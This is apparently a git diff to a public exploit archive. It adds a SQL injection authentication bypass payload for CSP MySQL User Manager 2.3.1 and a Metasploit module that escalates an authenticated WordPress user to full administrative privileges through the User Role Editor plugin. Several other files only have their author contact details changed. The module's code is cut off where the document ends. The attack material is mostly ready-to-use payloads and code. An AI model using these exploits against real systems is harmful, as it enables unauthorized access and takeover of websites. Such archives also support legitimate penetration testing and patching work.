diff --git a/exploits/linux/webapps/44589.txt b/exploits/linux/webapps/44589.txt
new file mode 100644
index 000000000..b010d8fbf
--- /dev/null
+++ b/exploits/linux/webapps/44589.txt
@@ -0,0 +1,41 @@
+# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
+# Date: 2018-05-04
+# Exploit Author: Youssef mami
+# Vendor Homepage: https://code.google.com/archive/p/cspmum/
+# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+# Version: 2.3.1
+# Tested on: Linux 2.6.38-11
+# CVE : CVE-2018-10757
+
+##################################################################################
+.__ __
+| |__ _____ _____ _____ _____ _____ _____/ |_
+| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
+| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
+|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
+ \/ \/ \/ \/ \/ \/ \/
+.__ _____ __ .__
+|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
+| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
+| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
+|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ >
+ \/ \/ \/ |__| \/
+ .__
+ ______ ______________ _|__| ____ ____ ______
+ / ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
+ \___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
+/____ >\___ >__| \_/ |__|\___ >___ >____ >
+ \/ \/ \/ \/ \/
+
+
+##################################################################################
+SQL Injection Authentication Bypass
+Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
+
+Author(Pentester): Youssef mami (contact@hammamet-services.com)
+On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
+On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
+##################################################################################
+we just need to input admin login like this : admin' or ' 1=1-- and any password :-)
+login : admin' or ' 1=1--
+password: hammamet informatique services
\ No newline at end of file
diff --git a/exploits/php/webapps/40804.txt b/exploits/php/webapps/40804.txt
index 4efd18793..60a4e4bbd 100644
--- a/exploits/php/webapps/40804.txt
+++ b/exploits/php/webapps/40804.txt
@@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
-# Contact: info@tad.bg
-# Website: http://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8
diff --git a/exploits/php/webapps/40971.txt b/exploits/php/webapps/40971.txt
index cc463abef..f8384c378 100644
--- a/exploits/php/webapps/40971.txt
+++ b/exploits/php/webapps/40971.txt
@@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
-# Contact: info@tad.bg
-# Website: http://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1 - Description
diff --git a/exploits/php/webapps/41919.txt b/exploits/php/webapps/41919.txt
index 0e8b0e22e..885d7784f 100644
--- a/exploits/php/webapps/41919.txt
+++ b/exploits/php/webapps/41919.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
diff --git a/exploits/php/webapps/41920.txt b/exploits/php/webapps/41920.txt
index ef6a46f09..6c1690908 100644
--- a/exploits/php/webapps/41920.txt
+++ b/exploits/php/webapps/41920.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/41921.txt b/exploits/php/webapps/41921.txt
index 4883b51eb..f63dfe57f 100644
--- a/exploits/php/webapps/41921.txt
+++ b/exploits/php/webapps/41921.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/41922.txt b/exploits/php/webapps/41922.txt
index 29656062c..674badc48 100644
--- a/exploits/php/webapps/41922.txt
+++ b/exploits/php/webapps/41922.txt
@@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
-# Contact: info@tad.bg
-# Website: https://tad.bg
+# Contact: info@tad.group
+# Website: https://tad.group
# Category: Web Application Exploits
1. Description
diff --git a/exploits/php/webapps/44595.rb b/exploits/php/webapps/44595.rb
new file mode 100755
index 000000000..84dae8d91
--- /dev/null
+++ b/exploits/php/webapps/44595.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
+ 'Description' => %q{
+ The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
+ check within its update user profile functionality ("update" function, contained
+ within the "class-user-other-roles.php" module).
+ Instead of verifying whether the current user has the right to edit other users'
+ profiles ("edit_users" WP capability), the vulnerable function verifies whether the
+ current user has the rights to edit the user ("edit_user" WP function) specified by
+ the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
+ user id is the current user's id, this check is always bypassed (i.e. the current
+ user is always allowed to modify its profile).
+ This vulnerability allows an authenticated user to add arbitrary User Role Editor
+ roles to its profile, by specifying them via the "ure_other_roles" parameter within
+ the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
+ clicked).
+ By default, this module grants the specified WP user all administrative privileges,
+ existing within the context of the User Role Editor plugin.
+ },
+ 'Author' =>
+ [
+ 'ethicalhack3r', # Vulnerability discovery
+ 'Tomislav Paskalev' # Exploit development, metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['WPVDB', '8432'],
+ ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
+ ],
+ 'DisclosureDate' => 'Apr 05 2016',
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
+ OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
+ OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
+ OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
+ OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
+ OptString.new('USERNAME', [true, 'WordPress username']),
+ OptString.new('PASSWORD', [true, 'WordPress password']),
+ OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
+ ])
+ end
+
+ # Detect the vulnerable plugin by enumerating its readme.txt file
+ def check
+ readmes = ['readme.txt', 'Readme.txt', 'README.txt']
+
+ res = nil
+ readmes.each do |readme_name|
+ readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
+ vprint_status("Checking #{readme_url}")
+ res = send_request_cgi(
+ 'uri' => readme_url,
+ 'method' => 'GET'
+ )
+ break if res && res.code == 200
+ end
+
+ if res.nil? || res.code != 200
+ # The readme.txt file does not exist
+ return Msf::Exploit::CheckCode::Unknown
+ end
+
+ version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
+ return version_res
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ # Search for specified data within the provided HTTP response
+ def check_response(res, name, regex)
+ res.body =~ regex
+ result = $1
+ if result
+ print_good("#{peer} - WordPress - Getting data - #{name}")
+ else
+ vprint_error("#{peer} #{res.body}")
+ fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
+ end
+ return result
+ end
+
+ # Run the exploit
+ def run
+ # Check if the specified target is running WordPress
+ fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
+
+ # Authenticate to WordPress
+ print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
+ cookie = wordpress_login(username, password)
+ fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ print_good("#{peer} - WordPress - Authentication - OK")
+
+ # Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
+ url = normalize_uri(wordpress_url_backend, 'profile.php')
+ print_status("#{peer} - WordPress - Getting data - #{url}")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => url,
+ 'cookie' => cookie
+ })
+
+ if res and res.code == 200
+ wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
+ color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
+ checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
+ nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
+ display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\